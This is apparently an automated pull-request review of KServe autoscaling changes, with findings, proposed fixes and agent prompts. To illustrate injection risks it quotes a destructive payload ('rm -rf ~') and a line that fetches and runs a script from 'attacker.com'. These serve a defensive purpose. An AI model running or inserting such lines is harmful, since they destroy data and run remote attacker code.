summary including endpoint, total_requests, failed_requests and an error rate so
scale-up failures can be distinguished from load-delivery failures; reference
the _worker function and the requests.post call (using endpoint, payload,
headers, timeout) when making these additions and ensure the summary is asserted
or surfaced after the load phase before calling wait_for_pod_count.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh-562-585 (1)

562-585: ⚠️ Potential issue | 🟡 Minor

eval on an externally-derived identifier is a CWE-94 liability.

eval "current_value=\${${var_name}}" / eval "export $var_name=\"$component_value\"" executes arbitrary shell if var_name or component_value ever originates from user input. Today all callers are in-repo, but the function has no validation, no [[ "$var_name" =~ ^[A-Z_][A-Z0-9_]*$ ]] guard, and component_value is interpolated unquoted into the eval string — a value containing "; rm -rf ~; # would execute. Prefer declare -n (bash 4.3+) or printf -v.

🛠️ Proposed fix
-    local current_value
-    eval "current_value=\${${var_name}}"
+    local current_value="${!var_name:-}"
@@
-    if [ -n "$component_value" ]; then
-        eval "export $var_name=\"$component_value\""
-    elif [ -n "$global_value" ]; then
-        eval "export $var_name=\"$global_value\""
-    fi
+    if [ -n "$component_value" ]; then
+        printf -v "$var_name" '%s' "$component_value"
+        export "$var_name"
+    elif [ -n "$global_value" ]; then
+        printf -v "$var_name" '%s' "$global_value"
+        export "$var_name"
+    fi

As per coding guidelines: "Avoid eval and dynamic command execution".

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 562 - 585, The function set_env_with_priority uses eval with
external identifiers (eval "current_value=\${${var_name}}" and eval "export
$var_name=\"$component_value\""), which is unsafe; validate var_name against a
safe identifier regex (e.g. [[ "$var_name" =~ ^[A-Z_][A-Z0-9_]*$ ]]) and
reject/exit if it fails, then replace eval usage with safe indirection and
assignment: read current value via indirect expansion
(current_value="${!var_name}") and set the value using printf -v "$var_name"
'%s' "$component_value" (or declare -n ref="$var_name" on bash ≥4.3) and export
with export "$var_name" (after setting) — also ensure component_value and
global_value are used only as data (quoted) when assigning to avoid command
injection.
test/e2e/llmisvc/test_llm_autoscaling.py-140-145 (1)

140-145: ⚠️ Potential issue | 🟡 Minor

_child_name uses naive truncation instead of hashing like kmeta.ChildName.

Knative's kmeta.ChildName appends a hash suffix when the concatenated name exceeds the DNS label limit and uses a hash-based format when the suffix alone exceeds 31 characters. The Python helper instead naively concatenates and slices to 63 chars. When a service_name is long enough (≥ ~45 chars + suffix like -kserve-prefill-hpa), this generates a different string than the actual controller produces, causing assert_scaling_resources_exist and assert_scaling_resources_deleted assertions to fail for the wrong reason.

Current test names are short enough to avoid this, but this is a latent defect for any future test with a longer service name.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/llmisvc/test_llm_autoscaling.py` around lines 140 - 145, The
_child_name helper currently truncates parent+suffix naively which diverges from
knative.dev/pkg/kmeta.ChildName; replace its logic so it mirrors
kmeta.ChildName: when parent+suffix exceeds 63 chars compute a deterministic
hash (e.g., SHA-1/sha256) of the parent and embed a short hex hash segment
instead of simple truncation; also handle the case where the suffix alone is
long (suffix > 31) by using the hash-based format used by kmeta (produce a
stable name comprised of a truncated parent, a separator, hex hash, and the
suffix) so names produced by _child_name match the controller and fix failing
assertions like assert_scaling_resources_exist/assert_scaling_resources_deleted
that rely on identical naming.
pkg/controller/v1alpha2/llmisvc/scheduler.go-1041-1047 (1)

1041-1047: ⚠️ Potential issue | 🟡 Minor

Threshold comparison via fmt.Sprintf("%v", …) != "0" is fragile.

YAML decoders yield numeric types (int, float64) for unquoted scalars. The string comparison breaks when thresholdVal is float64(0.0) (prints as "0.0", not "0"). Use a numeric cast (thresholdVal.(float64) == 0 or similar) or reflect.Value.Zero() to compare by actual value, not string representation.

Occurs at lines 1045 and 1195.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1041 - 1047, The
current check using fmt.Sprintf("%v", thresholdVal) != "0" is fragile; update
the logic around thresholdVal/thresholdFound (the unstructured.NestedFieldNoCopy
call in scheduler.go) to perform a numeric zero check instead: do a type switch
on thresholdVal handling float64, int (and string as fallback by parsing) and
compare numeric value to 0 (e.g., float64 == 0.0 or int == 0); ensure you treat
missing/unsupported types as non-zero or continue. Replace the string-format
comparison with this type-aware numeric comparison wherever thresholdVal is used
(locations referenced by thresholdVal, thresholdFound, pluginMap).
🧹 Nitpick comments (9)
python/kserve/kserve/model_server.py (1)

131-141: Flag name uses hyphens while most KServe flags use underscores. --timeout-keep-alive follows the newer --event-loop style, but the majority of flags in this parser are underscore-delimited (--http_port, --max_threads, --log_config_file, etc.). argparse won't accept --timeout_keep_alive as an alias unless added explicitly, so any user/script copying the existing underscore convention will get a parse error. Consider either registering an underscore alias for backward/ergonomic consistency, or documenting the intentional shift.

♻️ Optional alias
 parser.add_argument(
-    "--timeout-keep-alive",
+    "--timeout-keep-alive", "--timeout_keep_alive",
     dest="timeout_keep_alive",
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/model_server.py` around lines 131 - 141, The flag name
uses hyphens while most KServe flags use underscores; update the
parser.add_argument call that defines "--timeout-keep-alive"
(dest="timeout_keep_alive") to also accept an underscore alias so scripts using
the underscore style won't break: add the second option string
"--timeout_keep_alive" (keeping dest="timeout_keep_alive", default=65, type=int,
help unchanged) in the same parser.add_argument call that currently registers
"--timeout-keep-alive" so both forms parse identically.
python/kserve/kserve/protocol/rest/server.py (1)

80-101: No bounds check on timeout_keep_alive. Negative or zero values are accepted here and handed straight to uvicorn.Config, where behavior is undefined/loosely defined. Low risk since this is CLI-sourced, but a if timeout_keep_alive < 0: raise ValueError(...) (or clamp) would make misconfiguration fail loudly instead of producing connections that drop unexpectedly.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/protocol/rest/server.py` around lines 80 - 101, The
constructor accepts timeout_keep_alive and passes it to uvicorn.Config without
validation; add a bounds check in the initializer (before creating self.config)
to reject non-positive values (e.g., if timeout_keep_alive <= 0: raise
ValueError("timeout_keep_alive must be > 0")) or clamp it to a sensible minimum,
so the parameter used in uvicorn.Config is always valid; update the code around
the timeout_keep_alive parameter handling where self.config is created to
perform this check and raise a clear error referencing timeout_keep_alive and
uvicorn.Config.
python/kserve/kserve/protocol/rest/multiprocess/server.py (1)

139-149: Positional forwarding into RESTServer is brittle. Every one of these nine arguments is passed positionally, so any future reorder or insertion in RESTServer.__init__ (e.g., adding a parameter between grace_period and event_loop) will silently misalign event_looptimeout_keep_alive and produce a nonsense uvicorn config with no type error. Switching to keyword arguments removes this foot-gun at zero cost.

♻️ Proposed refactor
         self._rest_server = RESTServer(
-            app,
-            data_plane,
-            model_repository_extension,
-            http_port,
-            access_log_format,
-            workers,
-            grace_period,
-            event_loop,
-            timeout_keep_alive,
+            app=app,
+            data_plane=data_plane,
+            model_repository_extension=model_repository_extension,
+            http_port=http_port,
+            access_log_format=access_log_format,
+            workers=workers,
+            grace_period=grace_period,
+            event_loop=event_loop,
+            timeout_keep_alive=timeout_keep_alive,
         )
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/kserve/protocol/rest/multiprocess/server.py` around lines 139 -
149, The call to RESTServer in server.py passes nine arguments positionally
which is brittle; change the instantiation to use explicit keyword arguments
matching RESTServer.__init__ (e.g., app=app, data_plane=data_plane,
model_repository_extension=model_repository_extension, http_port=http_port,
access_log_format=access_log_format, workers=workers, grace_period=grace_period,
event_loop=event_loop, timeout_keep_alive=timeout_keep_alive) so parameters
cannot be misaligned if the constructor signature changes.
python/kserve/test/test_rest_server.py (1)

50-52: Misleading inline comments in parametrize cases. (65, 65) is passed explicitly, so it isn't exercising the "default value" code path (that's what test_config_timeout_keep_alive_default covers). Similarly (5, 5) # uvicorn default passes 5 explicitly — this test only verifies propagation into uvicorn.Config, not that uvicorn's own default is 5. Consider rewording or removing the comments to avoid confusing future readers about what's actually under test.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/kserve/test/test_rest_server.py` around lines 50 - 52, The inline
comments next to the parametrized tuples (65, 65), (120, 120), and (5, 5) are
misleading because those tuples are explicit values (not exercising
uvicorn/default code paths); update the comments in
python/kserve/test/test_rest_server.py for the parametrized test that covers
timeout_keep_alive (and related test_config_timeout_keep_alive_default) to
either remove the incorrect notes or replace them with accurate notes such as
"explicit value" for (65,65) and (120,120) and "explicit propagation check into
uvicorn.Config" for (5,5), so readers understand these cases validate value
propagation rather than uvicorn defaults.
python/custom_transformer/pyproject.toml (1)

26-33: Consolidate duplicated [tool.uv.sources] and [[tool.uv.index]] blocks into a uv workspace.

The pytorch-cpu index definition is copy-pasted identically between python/custom_model/pyproject.toml (lines 22–29) and python/custom_transformer/pyproject.toml (lines 26–33). Future updates to the URL, name, or explicit flag must be mirrored in both locations, creating drift risk. Since no uv workspace root exists in python/pyproject.toml, promote this shared configuration to a workspace-level declaration to maintain a single source of truth.

Non-blocking for this PR.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@python/custom_transformer/pyproject.toml` around lines 26 - 33, Duplicate
[tool.uv.sources] and [[tool.uv.index]] blocks for the pytorch-cpu index
(entries for torch and torchvision, and the index with name = "pytorch-cpu", url
= "https://download.pytorch.org/whl/cpu", explicit = true) should be moved to
the workspace-level pyproject.toml under a single [tool.uv.sources] and
[[tool.uv.index]] declaration; remove the duplicate blocks from the module
pyproject.toml files so they inherit from the workspace root, ensuring the
single source of truth for the index configuration.
test/e2e/pytest.ini (1)

24-25: Marker registration duplicated in test/e2e/llmisvc/conftest.py.

autoscaling_hpa and autoscaling_keda are now declared in both pytest.ini and via config.addinivalue_line(...) in test/e2e/llmisvc/conftest.py. Not harmful, but it's two places to keep in sync on rename. Consider consolidating to pytest.ini only (it already applies repo-wide for the e2e suite) and dropping the addinivalue_line calls for these two from conftest.py.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/e2e/pytest.ini` around lines 24 - 25, Remove the duplicate marker
registration by deleting the two config.addinivalue_line(...) calls for
"autoscaling_hpa" and "autoscaling_keda" from test/e2e/llmisvc/conftest.py and
rely on the declarations already present in pytest.ini; specifically locate the
addinivalue_line usages in conftest.py that reference the autoscaling_hpa and
autoscaling_keda markers and remove those lines so the markers are declared only
in pytest.ini.
test/scripts/gh-actions/setup-deps.sh (1)

110-121: Unknown LLMISVC_AUTOSCALER values silently do nothing.

A typo like hap or kda passed from the workflow input produces no error and no autoscaler install, which will surface later as a confusing e2e failure. Consider validating the value and failing fast (only none|hpa|keda allowed).

🔧 Proposed fix
   if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
     ...
   elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
     ...
+  elif [[ $LLMISVC_AUTOSCALER != "none" ]]; then
+    echo "ERROR: Unknown LLMISVC_AUTOSCALER='${LLMISVC_AUTOSCALER}' (expected one of: none, hpa, keda)" >&2
+    exit 1
   fi
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/scripts/gh-actions/setup-deps.sh` around lines 110 - 121, Validate the
LLMISVC_AUTOSCALER value before branching: check that the environment variable
LLMISVC_AUTOSCALER is one of the allowed values ("none", "hpa", "keda") and if
not, print a clear error including the invalid value and exit with non-zero
status; update the existing conditional block that currently handles "hpa" and
"keda" to include an explicit "none" case (no-op) and add an else branch that
fails fast, so typos like "hap" or "kda" will cause the script to abort
immediately.
hack/setup/infra/manage.wva-helm.sh (1)

96-96: ${WVA_EXTRA_ARGS:-} is intentionally unquoted — document the contract.

The unquoted expansion is needed so callers can pass multiple flags via one env var, but that means values containing spaces (e.g., --set foo="a b") will be mis-split. Either document that WVA_EXTRA_ARGS must be shell-safe, or switch to an array (WVA_EXTRA_ARGS=(--set k=v ...) expanded as "${WVA_EXTRA_ARGS[@]}") for robustness. Shellcheck SC2086 is a true positive on the quoting rule but the split is intentional here.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/infra/manage.wva-helm.sh` at line 96, The unquoted expansion of
WVA_EXTRA_ARGS is intentional to allow multiple flags but risks word-splitting
for values with spaces; either document the contract that WVA_EXTRA_ARGS must be
shell-safe (no unescaped spaces, e.g., callers must quote or escape inner
spaces) or change the variable into a bash array and expand it safely;
specifically update the script references to use the WVA_EXTRA_ARGS array (and
all callers) and expand as the array form to preserve tokens, and add a short
comment above the variable expansion explaining the chosen contract so
ShellCheck/maintainers understand the intent.
hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh (1)

666-691: Duplicate variable definitions silently override earlier values.

PROMETHEUS_NAMESPACE (lines 666, 687) and WVA_NAMESPACE (lines 668, 689) are defined twice with identical defaults. Not a bug today, but if the "Global" block is ever retuned (e.g. a different default namespace or an override chain via set_env_with_priority), the second assignment clobbers the first and the divergence will be invisible. Drop the duplicates in the "Component-Specific" section.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 666 - 691, Remove the duplicate environment variable assignments in
the "Component-Specific" section: delete the redundant PROMETHEUS_NAMESPACE and
WVA_NAMESPACE lines so the global defaults (PROMETHEUS_NAMESPACE and
WVA_NAMESPACE set earlier) are the authoritative definitions; keep the other
component-specific variables (PROMETHEUS_RELEASE_NAME, WVA_RELEASE_NAME,
WVA_PROMETHEUS_URL) intact and verify there are no other duplicated vars in that
block.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Enterprise

Run ID: 7dc152a9-162e-4bd4-adb9-abb07b3bf516

📥 Commits

Reviewing files that changed from the base of the PR and between 56fa4f8 and e094d85.

⛔ Files ignored due to path filters (3)
  • go.sum is excluded by !**/*.sum, !**/*.sum
  • python/custom_model/uv.lock is excluded by !**/*.lock
  • python/custom_transformer/uv.lock is excluded by !**/*.lock
📒 Files selected for processing (50)
  • .github/actions/kserve-dep-setup/action.yml
  • .github/workflows/comment-cherry-pick.yml
  • .github/workflows/e2e-test-llmisvc.yaml
  • .github/workflows/e2e-test-quick-install.yaml
  • .github/workflows/e2e-test.yml
  • charts/kserve-runtime-configs/files/llmisvcconfigs/resources.yaml
  • config/llmisvcconfig/config-llm-decode-template.yaml
  • config/llmisvcconfig/config-llm-decode-worker-data-parallel.yaml
  • config/llmisvcconfig/config-llm-scheduler.yaml
  • config/overlays/test/s3-local-backend/seaweedfs-deployment.yaml
  • docs/samples/llmisvc/multi-gpu-vendor/README.md
  • docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-amd-no-scheduler.yaml
  • docs/samples/llmisvc/multi-gpu-vendor/llm-inference-service-qwen2-7b-nvidia-with-scheduler.yaml
  • go.mod
  • hack/setup/global-vars.env
  • hack/setup/infra/manage.prometheus-adapter-helm.sh
  • hack/setup/infra/manage.prometheus-helm.sh
  • hack/setup/infra/manage.wva-helm.sh
  • hack/setup/quick-install/definitions/llmisvc/llmisvc-autoscaling-hpa-dependency-install.definition
  • hack/setup/quick-install/definitions/llmisvc/llmisvc-autoscaling-keda-dependency-install.definition
  • hack/setup/quick-install/keda-dependency-install.sh
  • hack/setup/quick-install/kserve-knative-mode-dependency-install.sh
  • hack/setup/quick-install/kserve-knative-mode-full-install-helm.sh
  • hack/setup/quick-install/kserve-knative-mode-full-install-with-manifests.sh
  • hack/setup/quick-install/kserve-standard-mode-dependency-install.sh
  • hack/setup/quick-install/kserve-standard-mode-full-install-helm.sh
  • hack/setup/quick-install/kserve-standard-mode-full-install-with-manifests.sh
  • hack/setup/quick-install/llmisvc-autoscaling-hpa-dependency-install.sh
  • hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh
  • hack/setup/quick-install/llmisvc-dependency-install.sh
  • hack/setup/quick-install/llmisvc-full-install-helm.sh
  • hack/setup/quick-install/llmisvc-full-install-with-manifests.sh
  • kserve-deps.env
  • pkg/controller/v1alpha2/llmisvc/config_merge_test.go
  • pkg/controller/v1alpha2/llmisvc/config_presets_test.go
  • pkg/controller/v1alpha2/llmisvc/controller_int_scheduler_config_test.go
  • pkg/controller/v1alpha2/llmisvc/scheduler.go
  • pkg/controller/v1alpha2/llmisvc/scheduler_test.go
  • python/custom_model/pyproject.toml
  • python/custom_transformer/pyproject.toml
  • python/kserve/kserve/model_server.py
  • python/kserve/kserve/protocol/rest/multiprocess/server.py
  • python/kserve/kserve/protocol/rest/server.py
  • python/kserve/test/test_rest_server.py
  • test/e2e/llmisvc/conftest.py
  • test/e2e/llmisvc/fixtures.py
  • test/e2e/llmisvc/test_llm_autoscaling.py
  • test/e2e/pytest.ini
  • test/scripts/gh-actions/setup-deps.sh
  • test/scripts/gh-actions/setup-kserve.sh

Comment on lines 29 to +32
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

cat -n .github/actions/kserve-dep-setup/action.yml | head -40

Repository: opendatahub-io/kserve

Length of output: 1709


🌐 Web query:

GitHub Actions inputs shell command injection escaping behavior

💡 Result:

GitHub Actions does not automatically escape inputs (from workflow_dispatch, workflow_call, or action with) for safe use in shell commands. When ${{ inputs.name }} or ${{ github.event.inputs.name }} is used directly in a run: block, GitHub evaluates the expression and substitutes the raw string value into the shell script before the shell executes it. This raw substitution allows shell command injection if the input contains shell metacharacters like ", ;, $, , etc. Vulnerable example: - run: echo "version=${{ inputs.version }}" Malicious input version=1.0; curl attacker.com/backdoor.sh | bash breaks out and executes arbitrary code. Safe usage: Assign the input to an env var at step level, then reference as shell $VAR (properly quoted). The env var treats the input as literal data. - name: Safe env: VERSION: ${{ inputs.version }} run: echo "version=$VERSION" Shell interprets $VERSION literally, even if it contains metacharacters. Additional mitigations: Validate inputs with regex, use if: conditions or script files instead of inline run:, minimize permissions. This behavior is consistent across shells (bash, pwsh, etc.) and applies to all untrusted inputs like github.event.*.

Citations:


Quote inputs.deployment-mode before passing to shell.

${{ inputs.deployment-mode }} is unquoted at line 32 while adjacent inputs are properly quoted. GitHub Actions does not auto-escape inputs in run: blocks—raw substitution allows shell metacharacters to break argument boundaries and inject arbitrary commands (CWE-78). The input defaults to serverless or raw per the action definition, but remains user-controlled and must be quoted.

🛠️ Proposed fix
-        ./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
+        ./test/scripts/gh-actions/setup-deps.sh "${{ inputs.deployment-mode }}" "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}"
./test/scripts/gh-actions/setup-deps.sh ${{ inputs.deployment-mode }} "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
run: |
shopt -s nocasematch
echo "Selected network layer ${{ inputs.network-layer }}"
./test/scripts/gh-actions/setup-deps.sh "${{ inputs.deployment-mode }}" "${{ inputs.network-layer }}" "${{ inputs.enable-keda }}" "${{ inputs.deploy-llmisvc }}" "${{ inputs.autoscaler }}"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/actions/kserve-dep-setup/action.yml around lines 29 - 32, The run
block in action.yml passes the unquoted GitHub Actions input ${{
inputs.deployment-mode }} to the setup script, which can allow shell
metacharacter injection; update the command that invokes
./test/scripts/gh-actions/setup-deps.sh so that the deployment-mode argument is
wrapped in quotes just like the adjacent inputs (i.e., pass "${{
inputs.deployment-mode }}" alongside "${{ inputs.network-layer }}" etc.),
ensuring all inputs are consistently quoted before being forwarded to the shell.

Comment on lines +244 to +353
test-llmisvc-wva-autoscaling-hpa:
runs-on: ubuntu-latest
needs: [detect-changes, llmisvc-image-build]
strategy:
fail-fast: false
matrix:
install-method: ${{ fromJSON(needs.detect-changes.outputs.install_methods) }}
steps:
- name: Checkout source
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1

- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}

- name: Load KServe environment variables
run: ./kserve-images.sh --ci

- name: Free-up disk space
uses: ./.github/actions/free-up-disk-space

- name: Setup Go
uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5.6.0
with:
go-version-file: go.mod

- name: Setup Python
uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0
with:
python-version: "3.9"

- name: Setup Minikube
uses: ./.github/actions/minikube-setup

- name: Download LLMISvc controller image
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4.3.0
with:
name: ${{ env.LLMISVC_CONTROLLER_IMG }}-${{ env.TAG }}
path: ./tmp

- name: Download storage-initializer image
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4.3.0
with:
name: ${{ env.STORAGE_INIT_IMG }}-${{ env.TAG }}
path: ./tmp

- name: Load LLMISvc controller image into minikube
run: |
minikube image load ./tmp/${{ env.LLMISVC_CONTROLLER_IMG }}-${{ env.TAG }}
echo "Images in minikube:"
minikube image ls | grep ${{ env.LLMISVC_CONTROLLER_IMG }} || echo "No llmisvc-controller images found"

- name: Load storage-initializer image into minikube
run: |
minikube image load ./tmp/${{ env.STORAGE_INIT_IMG }}-${{ env.TAG }}
echo "Images in minikube:"
minikube image ls | grep ${{ env.STORAGE_INIT_IMG }} || echo "No storage-initializer images found"

- name: KServe dependency setup (HPA autoscaling)
uses: ./.github/actions/kserve-dep-setup
with:
deploy-llmisvc: "true"
autoscaler: "hpa"

- name: Install UV
run: ./test/scripts/gh-actions/setup-uv.sh

- name: Install KServe
run: |
${{ matrix.install-method == 'helm' && 'export INSTALL_METHOD="helm"' || '' }}
./test/scripts/gh-actions/setup-kserve.sh

- name: Verify HPA autoscaling setup
run: |
echo "Verifying HPA autoscaling infrastructure..."

echo "Prometheus:"
kubectl get pods -n monitoring -l app.kubernetes.io/name=prometheus || true

echo "Prometheus Adapter:"
kubectl get pods -n monitoring -l app.kubernetes.io/name=prometheus-adapter || true

echo "WVA:"
kubectl get pods -n wva-system || true

echo "CRDs:"
kubectl get crd variantautoscalings.llmd.ai || true

echo "External Metrics API:"
kubectl get apiservice v1beta1.external.metrics.k8s.io || true

echo ""
echo "HPA autoscaling setup verification complete!"

- name: Run HPA autoscaling E2E tests
id: autoscaling-hpa-tests
timeout-minutes: 40
run: |
./test/scripts/gh-actions/run-e2e-tests.sh "llminferenceservice and autoscaling_hpa and cluster_cpu" 0 "envoy-gateway"

- name: Check system status
if: always()
run: |
./test/scripts/gh-actions/status-check.sh "llmisvc"

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

cat .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 16862


Declare explicit permissions: blocks on all jobs to enforce least-privilege token scope (CWE-732).

The workflow lacks job-level permissions: declarations. Every job (detect-changes, llmisvc-image-build, test-llmisvc, and both autoscaling jobs) inherits the repository default token scope, allowing full GITHUB_TOKEN access if any step is compromised. Additionally, the "Merge target branch" steps across multiple jobs directly interpolate ${{ github.event.pull_request.base.ref }} in shell commands, violating the requirement to avoid event data interpolation in run: blocks (CWE-94). Use github.base_ref or intermediate environment variables instead.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-llmisvc.yaml around lines 244 - 353, The job
lacks explicit least-privilege job-level permissions and unsafe interpolation of
event data in run blocks: add a permissions: block to each job (e.g.,
detect-changes, llmisvc-image-build, test-llmisvc,
test-llmisvc-wva-autoscaling-hpa and the other autoscaling job) granting only
the scopes required (likely minimal read for contents and write only if needed
for status/artifacts), and remove direct use of ${{
github.event.pull_request.base.ref }} inside the "Merge target branch" run
steps; instead expose the base ref via a safe context or env var (e.g., set env:
BASE_REF: ${{ github.base_ref }} on the job) and reference that env var (e.g.,
$BASE_REF) in the git commands, or use action inputs like github.base_ref in a
preceding step to avoid interpolating event payloads in run:.

Comment on lines +255 to +262
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# First, check if the file exists and its line count
wc -l .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 109


🏁 Script executed:

# View lines 255-262 to confirm the snippet
sed -n '255,262p' .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 436


🏁 Script executed:

# View lines 365-372 to verify the second instance
sed -n '365,372p' .github/workflows/e2e-test-llmisvc.yaml

Repository: opendatahub-io/kserve

Length of output: 436


Stop injecting github.event.pull_request.base.ref straight into the shell.

Splicing event data directly into run: blocks exposes these steps to script injection (CWE-94). Pass the ref through env: and quote it in the shell instead.

🔒 Proposed fix
       - name: Merge target branch
         if: github.event_name == 'pull_request'
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           git fetch --unshallow origin
-          git fetch origin ${{ github.event.pull_request.base.ref }}
+          git fetch origin "$BASE_REF"
           git config user.email "ci@kserve.io"
           git config user.name "CI Bot"
-          git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
+          git merge --no-edit "origin/$BASE_REF"

Same issue at lines 365-372.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
- name: Merge target branch
if: github.event_name == 'pull_request'
env:
BASE_REF: ${{ github.event.pull_request.base.ref }}
run: |
git fetch --unshallow origin
git fetch origin "$BASE_REF"
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit "origin/$BASE_REF"
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-llmisvc.yaml around lines 255 - 262, The workflow
step "Merge target branch" injects github.event.pull_request.base.ref directly
into the run shell, which risks script injection; change the step to pass the
ref via an env variable (e.g., BASE_REF: ${{ github.event.pull_request.base.ref
}}) and then reference and quote that env var in the run commands (use
"$BASE_REF" when calling git fetch and git merge) to ensure safe shell
expansion; apply the same env-based fix to the other Merge/merge-ref step found
later in the file.

Comment on lines +37 to +45
- name: Merge target branch
if: github.event_name == 'pull_request'
run: |
git fetch --unshallow origin
git fetch origin ${{ github.event.pull_request.base.ref }}
git config user.email "ci@kserve.io"
git config user.name "CI Bot"
git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
- uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3.0.2
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Find and display the workflow file
find . -name "e2e-test-quick-install.yaml" -o -name "e2e-test-quick-install.yml"

Repository: opendatahub-io/kserve

Length of output: 113


🏁 Script executed:

# Read the workflow file to examine the flagged sections
cat -n .github/workflows/e2e-test-quick-install.yaml

Repository: opendatahub-io/kserve

Length of output: 9185


Move github.event.pull_request.base.ref to environment variables and quote all uses.

Direct event data interpolation in run: blocks enables script injection (CWE-94). Pass event values via env: with proper shell quoting instead.

This pattern appears at lines 41, 44, 76, 79, 143, and 146—all instances of the same vulnerability across the three "Merge target branch" steps.

Proposed fix
       - name: Merge target branch
         if: github.event_name == 'pull_request'
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           git fetch --unshallow origin
-          git fetch origin ${{ github.event.pull_request.base.ref }}
+          git fetch origin "$BASE_REF"
           git config user.email "ci@kserve.io"
           git config user.name "CI Bot"
-          git merge --no-edit origin/${{ github.event.pull_request.base.ref }}
